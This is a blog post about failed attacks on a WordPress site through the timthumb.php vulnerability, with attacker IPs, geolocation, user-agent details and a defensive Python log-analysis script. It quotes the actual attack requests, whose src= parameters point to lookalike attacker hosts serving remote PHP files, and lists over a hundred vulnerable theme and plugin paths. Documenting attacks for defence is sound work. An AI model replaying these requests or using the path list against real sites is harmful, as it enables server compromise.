Turning sites into zombies through the timthumb.php vulnerability!

Since I created db_error.php, I have been receiving all sorts of database-related error reports by email.

Normally these db_error-related messages land in the regular mailbox, but this time they were for some reason classified as spam. Digging into the cause a little, I confirmed that they were triggered by attempts to exploit the well-known WordPress timthumb.php vulnerability.

Unfortunately for the attackers, our WordPress site does not use timthumb or anything like it, so the attacks against that vulnerability failed. Below I am exposing the information I have on the attackers.


In fact, when I looked at the logs there were a huge number of these timthumb attacks. Extracting only the timthumb requests since the beginning of this year, I found that it had been tried more than 600 times! The first thing to do is block the attackers' IP addresses.

  1. Attacker #1: attacked 5 times between 2012/05/22 13:04:16 and 13:32:17 UTC.

    Requests used in the attack

    /(article name on this site)/wp-content/themes/wordprees/timthumb.php?src=http://picasa.com.ipsupply.com.au/wp-content/uploads/2012/03/load.php
    /wp-content/themes/wordprees/timthumb.php?src=http%3A%2F%2Fpicasa.com.ipsupply.com.au%2Fwp-content%2Fuploads%2F2012%2F03%2FIN.php
    //wp-content/themes/wordprees/timthumb.php?src=http://picasa.com.ipsupply.com.au/wp-content/uploads/2012/03/load.php
    /(article name on this site)/wp-content/themes/wordprees/timthumb.php?src=http%3A%2F%2Fpicasa.com.ipsupply.com.au%2Fwp-content%2Fuploads%2F2012%2F03%2FIN.php


    Attacker's IP address: 178.32.137.94

    General information from the IP address

    IP: 178.32.137.94
    Decimal: 2988476766
    Hostname: 178-32-137-94.ovh.net
    ISP: Ovh Systems
    Organization: OVH Srl
    Services: None detected
    Type:
    Assignment: Static IP

    Area information from the IP address (Geolocation)

    Country: Italy
    Latitude: 42.8333
    Longitude: 12.8333

    Other information

    Remote host: 178-32-137-94.ovh.net
    Attacker's user agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6

    Information from the user agent (below from UserAgentString.com)

    Firefox: Browser, Firefox 3.6
    Mozilla: MozillaProductSlice. Claims to be a Mozilla based user agent, which is only true for Gecko browsers like Firefox and Netscape. For all other user agents it means 'Mozilla-compatible'. In modern browsers, this is only used for historical reasons. It has no real meaning anymore.
    5.0: Mozilla version
    Windows: Platform
    U: Security value (N for no security, U for strong security, I for weak security)
    Windows NT 5.1: Operating System, Windows XP
    en-US: Language Tag, indicates the language for which the client had been localized (e.g. menus and buttons in the user interface); en-US = English – United States
    rv:1.9.2: CVS Branch Tag, the version of Gecko being used in the browser
    Gecko: Gecko engine inside
    20100115: Build Date, the date the browser was built
    Firefox: Name, Firefox
    3.6: Firefox version
  2. Attacker #2: attacked 120 times on 2012/04/18 UTC
    and another 121 times on 2012/05/13 UTC.

    Requests used in the attack (121 items below, duplicates removed)

    /wp-content/themes/8q/scripts/timthumb.php
    /wp-content/themes/aerial/lib/timthumb.php
    /wp-content/themes/aesthete/timthumb.php
    /wp-content/themes/albizia/includes/timthumb.php
    /wp-content/themes/amphion-lite/script/timthumb.php
    /wp-content/themes/aqua-blue/includes/timthumb.php
    /wp-content/themes/aranovo/scripts/timthumb.php
    /wp-content/themes/arras/library/timthumb.php
    /wp-content/themes/arras-theme/library/timthumb.php
    /wp-content/themes/arthemix-bronze/scripts/timthumb.php
    /wp-content/themes/arthemix-green/scripts/timthumb.php
    /wp-content/themes/artisan/includes/timthumb.php
    /wp-content/themes/a-simple-business-theme/scripts/timthumb.php
    /wp-content/themes/a-supercms/timthumb.php
    /wp-content/themes/aureola/scripts/timthumb.php
    /wp-content/themes/aurorae/timthumb.php
    /wp-content/themes/automotive-blog-theme/Quick%20Cash%20Auto/timthumb.php
    /wp-content/themes/automotive-blog-theme/timthumb.php
    /wp-content/themes/black_eve/timthumb.php
    /wp-content/themes/blex/scripts/timthumb.php
    /wp-content/themes/bloggnorge-a1/scripts/timthumb.php
    /wp-content/themes/blogified/timthumb.php
    /wp-content/themes/blue-corporate-hyve-theme/timthumb.php
    /wp-content/themes/bluemag/library/timthumb.php
    /wp-content/themes/blue-news/scripts/timthumb.php
    /wp-content/themes/bombax/includes/timthumb.php
    /wp-content/themes/breakingnewz/timthumb.php
    /wp-content/themes/brightsky/scripts/timthumb.php
    /wp-content/themes/brochure-melbourne/includes/timthumb.php
    /wp-content/themes/business-turnkey/assets/js/timthumb.php
    /wp-content/themes/calotropis/includes/timthumb.php
    /wp-content/themes/comet/scripts/timthumb.php
    /wp-content/themes/conceditor-wp-strict/scripts/timthumb.php
    /wp-content/themes/constructor/libs/timthumb.php
    /wp-content/themes/constructor/timthumb.php
    /wp-content/themes/coverht-wp/scripts/timthumb.php
    /wp-content/themes/cover-wp/scripts/timthumb.php
    /wp-content/themes/dark-dream-media/timthumb.php
    /wp-content/themes/deep-blue/timthumb.php
    /wp-content/themes/dimenzion/timthumb.php
    /wp-content/themes/epione/script/timthumb.php
    /wp-content/themes/evr-green/scripts/timthumb.php
    /wp-content/themes/famous/timthumb.php
    /wp-content/themes/featuring/timthumb.php
    /wp-content/themes/fliphoto/timthumb.php
    /wp-content/themes/flix/timthumb.php
    /wp-content/themes/fresh-blu/scripts/timthumb.php
    /wp-content/themes/go-green/modules/timthumb.php
    /wp-content/themes/granite-lite/scripts/timthumb.php
    /wp-content/themes/greydove/timthumb.php
    /wp-content/themes/greyzed/functions/efrog/lib/timthumb.php
    /wp-content/themes/heli-1-wordpress-theme/images/timthumb.php
    /wp-content/themes/ideatheme/timthumb.php
    /wp-content/themes/impressio/timthumb/timthumb.php
    /wp-content/themes/iwana-v10/timthumb.php
    /wp-content/themes/likehacker/timthumb.php
    /wp-content/themes/litepress/scripts/timthumb.php
    /wp-content/themes/magup/timthumb.php
    /wp-content/themes/make-money-online-theme-1/scripts/timthumb.php
    /wp-content/themes/make-money-online-theme-2/scripts/timthumb.php
    /wp-content/themes/make-money-online-theme-3/scripts/timthumb.php
    /wp-content/themes/make-money-online-theme-4/scripts/timthumb.php
    /wp-content/themes/make-money-online-theme/scripts/timthumb.php
    /wp-content/themes/moi-magazine/timthumb.php
    /wp-content/themes/my-heli/images/timthumb.php
    /wp-content/themes/mymag/timthumb.php
    /wp-content/themes/mystique/extensions/auto-thumb/timthumb.php
    /wp-content/themes/nash/theme-assets/php/timthumb.php
    /wp-content/themes/neofresh/timthumb.php
    /wp-content/themes/new-green-natural-living-ngnl/scripts/timthumb.php
    /wp-content/themes/pearlie/scripts/timthumb.php
    /wp-content/themes/pico/scripts/timthumb.php
    /wp-content/themes/postage-sydney/includes/timthumb.php
    /wp-content/themes/probluezine/timthumb.php
    /wp-content/themes/regal/timthumb.php
    /wp-content/themes/shaan/timthumb.php
    /wp-content/themes/shadow/timthumb.php
    /wp-content/themes/simple-but-great/timthumb.php
    /wp-content/themes/simplenews_premium/scripts/timthumb.php
    /wp-content/themes/simple-red-theme/timthumb.php
    /wp-content/themes/simplewhite/timthumb.php
    /wp-content/themes/slidette/timThumb/timthumb.php
    /wp-content/themes/spotlight/timthumb.php
    /wp-content/themes/squeezepage/timthumb.php
    /wp-content/themes/suffusion/timthumb.php
    /wp-content/themes/swift/includes/timthumb.php
    /wp-content/themes/swift/timthumb.php
    /wp-content/themes/the_dark_os/tools/timthumb.php
    /wp-content/themes/tm-theme/js/timthumb.php
    /wp-content/themes/totallyred/scripts/timthumb.php
    /wp-content/themes/travelogue-theme/scripts/timthumb.php
    /wp-content/themes/true-blue-theme/timthumb.php
    /wp-content/themes/ttnews-theme/timthumb.php
    /wp-content/themes/twittplus/scripts/timthumb.php
    /wp-content/themes/typographywp/timthumb.php
    /wp-content/themes/ugly/timthumb.php
    /wp-content/themes/unity/timthumb.php
    /wp-content/themes/versitility/timthumb.php
    /wp-content/themes/vibefolio-teaser-10/scripts/timthumb.php
    /wp-content/themes/wpbus-d4/includes/timthumb.php
    /wp-content/themes/wp-creativix/scripts/timthumb.php
    /wp-content/themes/wp-newsmagazine/scripts/timthumb.php
    /wp-content/themes/wp-perfect/js/timthumb.php
    /wp-content/themes/wp-premium-orange/timthumb.php
    /wp-content/themes/zcool-like/timthumb.php
    /wp-content/themes/lifestyle/timthumb.php
    /wp-content/themes/Karma/timthumb.php
    /wp-content/plugins/category-grid-view-gallery/includes/timthumb.php
    /wp-content/plugins/wp-marketplace/libs/timthumb.php
    /wp-content/plugins/dp-thumbnail/timthumb/timthumb.php
    /wp-content/plugins/vk-gallery/lib/timthumb.php
    /wp-content/plugins/cac-featured-content/timthumb.php
    /wp-content/plugins/rent-a-car/libs/timthumb.php
    /wp-content/plugins/lisl-last-image-slider/timthumb.php
    /wp-content/plugins/islidex/js/timthumb.php
    /wp-content/plugins/kino-gallery/timthumb.php
    /wp-content/plugins/cms-pack/timthumb.php
    /wp-content/plugins/a-gallery/timthumb.php
    /wp-content/plugins/category-list-portfolio-page/scripts/timthumb.php
    /wp-content/plugins/verve-meta-boxes/tools/timthumb.php
    /wp-content/plugins/extend-wordpress/helpers/timthumb/image.php


    Attacker's IP address: 91.201.64.85

    General information from the IP address

    IP: 91.201.64.85
    Decimal: 1539915861
    Hostname: 91.201.64.85
    ISP: DonEkoService Ltd
    Organization: DonEkoService Ltd
    Services: None detected
    Type: Broadband
    Assignment: Static IP

    Area information from the IP address (Geolocation)

    Country: Russian Federation
    Latitude: 60
    Longitude: 100

    Other information

    Remote host: 91.201.64.85
    Attacker's user agent: Mozila/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)

    Information from the user agent (below from UserAgentString.com)

    Internet Explorer: Browser, Internet Explorer 6.0
    Mozila: ???
    4.0: ???
    compatible: Compatibility flag, indicates that this browser is compatible with a common set of features
    MSIE 6.0: Name, Internet Explorer version 6.0
    Windows NT 5.1: Operating System, Windows XP
  3. Attacker #3: attacked 3 times between 2012/01/16 08:48:30 and 08:58:46 UTC.

    Requests used in the attack (duplicates removed)

    /(article name on this site)/wp-content/themes/Quadro/scripts/timthumb.php?src=http://blogger.com.v2training.com.au/rei/myid.php
    /wp-content/themes/Quadro/scripts/timthumb.php?src=http://blogger.com.v2training.com.au/rei/myid.php


    Attacker's IP address: 176.9.44.3

    General information from the IP address

    IP: 176.9.44.3
    Decimal: 2953391107
    Hostname: h124526.exima-online.net
    ISP: Hetzner Online AG
    Organization: Hetzner Online AG
    Services: None detected
    Type: Corporate
    Assignment: Static IP

    Area information from the IP address (Geolocation)

    Country: Germany
    Latitude: 51
    Longitude: 9

    Other information

    Remote host: h124526.exima-online.net
    Attacker's user agent: BlackBerry8310/4.5.0.55 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/212

    Information from the user agent (below from UserAgentString.com)

    BlackBerry: OS, BlackBerry
    BlackBerry8310: Name, BlackBerry model 8310
    4.5.0.55: Operating System, BlackBerry OS version 4.5.0
    Profile: Profile, see next line
    MIDP-2.0: Mobile Information Device Profile, a specification published for the use of Java on embedded devices, version 2.0
    Configuration: Configuration, see next line
    CLDC-1.1: Connected Limited Device Configuration, a specification of a framework for Java ME applications, version 1.1
    VendorID: Id of the vendor
    212: Vendor, Etisalat/Etisalat Nigeria/Etisalat Misr
    Description: Browser for the BlackBerry smartphone
  4. Attacker #4: attacked 3 times between 2012/02/16 4:51:34 and 4:51:41 UTC.

    Requests used in the attack (duplicates removed)

    /wp-content/themes/photo-workshop/includes/timthumb.php?src=http://wordpress.com.wbhealthcareservices.com/myid.php
    /(category name on this site)/wp-content/themes/photo-workshop/includes/timthumb.php?src=http://wordpress.com.wbhealthcareservices.com/myid.php
    /(category name on this site)/wp-content/themes/photo-workshop/includes/timthumb.php?src=http://wordpress.com.wbhealthcareservices.com/myid.php


    Attacker's IP address: 178.255.45.99

    General information from the IP address

    IP: 178.255.45.99
    Decimal: 3003067747
    Hostname: da01.gda.vipower.pl
    ISP: Artnet Spolka z ograniczona odpowiedzialnoscia
    Organization: Vibiznes
    Services: None detected
    Type:
    Assignment: Static IP

    Area information from the IP address (Geolocation)

    Country: Poland
    State/Region: Mazowieckie
    City: Warsaw
    Latitude: 52.25
    Longitude: 21

    Other information

    Remote host: da01.gda.vipower.pl
    Attacker's user agent: Mozilla/3.0 (OS/2; U)

    Information from the user agent (below from UserAgentString.com)

    Netscape: Browser, Netscape 3.0
    Mozilla: MozillaProductSlice. Claims to be a Mozilla based user agent, which is only true for Gecko browsers like Firefox and Netscape. For all other user agents it means 'Mozilla-compatible'. In modern browsers, this is only used for historical reasons. It has no real meaning anymore.
    3.0: Browser version
    OS/2: Operating System, OS/2
    U: Security value (N for no security, U for strong security, I for weak security)
  5. Attacker #5: attacked 2 times between 2012/05/22 16:56:39 and 16:56:43 UTC.

    Requests used in the attack (duplicates removed)

    /(article name on this site)/wp-content/themes/Quadro/timthumb.php?src=http://wordpress.com.wbhealthcareservices.com/myid.php
    /wp-content/themes/Quadro/timthumb.php?src=http://wordpress.com.wbhealthcareservices.com/myid.php


    Attacker's IP address: 184.107.145.18

    General information from the IP address

    IP: 184.107.145.18
    Decimal: 3094057234
    Hostname: 184.107.145.18
    ISP: Iweb Technologies
    Organization: Gate
    Services: None detected
    Type: Broadband
    Assignment: Static IP

    Area information from the IP address (Geolocation)

    Country: Canada
    State/Region: Quebec
    City: Montreal
    Latitude: 45.5
    Longitude: -73.5833
    Postal Code: h3e1z6

    Other information

    Remote host: 184.107.145.18
    Attacker's user agent: Mozilla/5.0 (SymbianOS/9.1; U; en-us) AppleWebKit/413 (KHTML, like Gecko) Safari/413 es61i

    Information from the user agent (below from UserAgentString.com)

    Safari: Browser, Safari
    Mozilla: MozillaProductSlice. Claims to be a Mozilla based user agent, which is only true for Gecko browsers like Firefox and Netscape. For all other user agents it means 'Mozilla-compatible'. In modern browsers, this is only used for historical reasons. It has no real meaning anymore.
    5.0: Mozilla version
    SymbianOS: Operating System, Symbian OS
    9.1: SymbianOS version
    U: Security value (N for no security, U for strong security, I for weak security)
    en-us: Language Tag, indicates the language for which the client had been localized (e.g. menus and buttons in the user interface); en-us = English – United States
    AppleWebKit: The Web Kit provides a set of core classes to display web content in windows
    413: Web Kit build
    KHTML: Open Source HTML layout engine developed by the KDE project
    like Gecko: like Gecko…
    Safari: Name, Safari
    413: Safari build number
    es61i: Nokia handset model name
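The log review done by hand above (pull out the timthumb requests, read the src= target, count hits per address so the addresses can be blocked) can be scripted. The Python below is an added example, not code from the original post: its log lines are constructed in Apache combined format from the paths, addresses and user agents listed above, and the allowlist of remote image hosts is an assumption for the demonstration. It also puts the two host checks side by side, because the src= values seen here (picasa.com.ipsupply.com.au, blogger.com.v2training.com.au, wordpress.com.wbhealthcareservices.com) all begin with a well-known image host: a substring match, the check the vulnerable timthumb releases used, accepts them, while an exact or dotted-suffix match rejects them. The path test is deliberately broader than the post's list and also catches the renamed copy under .../timthumb/image.php.

```python
import re
from collections import Counter
from urllib.parse import parse_qs, urlsplit

# Constructed sample log lines (Apache combined format, not copied from the
# original post); paths, addresses and user agents mirror the ones listed above.
SAMPLE_LOG = """\
178.32.137.94 - - [22/May/2012:13:04:16 +0000] "GET /wp-content/themes/wordprees/timthumb.php?src=http%3A%2F%2Fpicasa.com.ipsupply.com.au%2Fwp-content%2Fuploads%2F2012%2F03%2FIN.php HTTP/1.1" 404 512 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
176.9.44.3 - - [16/Jan/2012:08:48:30 +0000] "GET /wp-content/themes/Quadro/scripts/timthumb.php?src=http://blogger.com.v2training.com.au/rei/myid.php HTTP/1.1" 404 512 "-" "BlackBerry8310/4.5.0.55 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/212"
91.201.64.85 - - [18/Apr/2012:10:00:01 +0000] "GET /wp-content/themes/arras/library/timthumb.php HTTP/1.1" 404 512 "-" "Mozila/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
91.201.64.85 - - [18/Apr/2012:10:00:02 +0000] "GET /wp-content/plugins/extend-wordpress/helpers/timthumb/image.php HTTP/1.1" 404 512 "-" "Mozila/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
203.0.113.7 - - [18/Apr/2012:10:00:05 +0000] "GET /wp-content/uploads/2012/03/photo.jpg HTTP/1.1" 200 4096 "-" "Mozilla/5.0"
"""

# Apache combined format: ip ident user [time] "request" status bytes "referer" "agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+)[^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"'
)

# Assumed allowlist of remote image hosts for the demonstration; the src= values
# in the sample log use exactly these names as the prefix of a different domain.
ALLOWED_HOSTS = ("picasa.com", "blogger.com", "wordpress.com")


def host_allowed_weak(host, allowed=ALLOWED_HOSTS):
    """Substring check, the pattern the vulnerable timthumb releases used:
    'picasa.com.ipsupply.com.au' contains 'picasa.com', so it is accepted."""
    host = host.lower()
    return any(site in host for site in allowed)


def host_allowed_strict(host, allowed=ALLOWED_HOSTS):
    """Exact host or dotted-suffix match: picasa.com itself or a real subdomain
    such as lh3.picasa.com passes; a lookalike prefix is rejected."""
    host = host.lower().rstrip(".")
    return any(host == site or host.endswith("." + site) for site in allowed)


def analyze(log_text):
    """Return (hits, per_ip): every request touching a timthumb path, with the
    decoded src= host and the verdict of each allowlist check, plus a per-IP
    count of such requests."""
    hits, per_ip = [], Counter()
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        parts = urlsplit(m.group("target"))
        # Any path component named timthumb, which also catches .../timthumb/image.php
        if "timthumb" not in parts.path.lower():
            continue
        # parse_qs percent-decodes, so http%3A%2F%2F... comes back as http://...
        src = parse_qs(parts.query).get("src", [None])[0]
        src_host = urlsplit(src).hostname if src else None
        hits.append({
            "ip": m.group("ip"),
            "time": m.group("ts"),
            "path": parts.path,
            "src_host": src_host,
            "weak_allows": host_allowed_weak(src_host) if src_host else None,
            "strict_allows": host_allowed_strict(src_host) if src_host else None,
            "status": int(m.group("status")),
            "ua": m.group("ua"),
        })
        per_ip[m.group("ip")] += 1
    return hits, per_ip


def ips_to_block(per_ip, threshold=1):
    """Addresses with at least `threshold` timthumb requests, most active first."""
    return [ip for ip, n in per_ip.most_common() if n >= threshold]


if __name__ == "__main__":
    hits, per_ip = analyze(SAMPLE_LOG)
    for h in hits:
        print(f'{h["ip"]:15} {h["path"]}  src_host={h["src_host"]} '
              f'weak={h["weak_allows"]} strict={h["strict_allows"]}')
    print("block:", ips_to_block(per_ip))
```

Run it against a real access log by replacing SAMPLE_LOG with the file contents; a 404 on every hit, as in this site's case, means the probed file does not exist, while a 200 on a timthumb path is the line worth investigating first.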
Short URL of this page: https://thejuraku.com/pc/?p=1037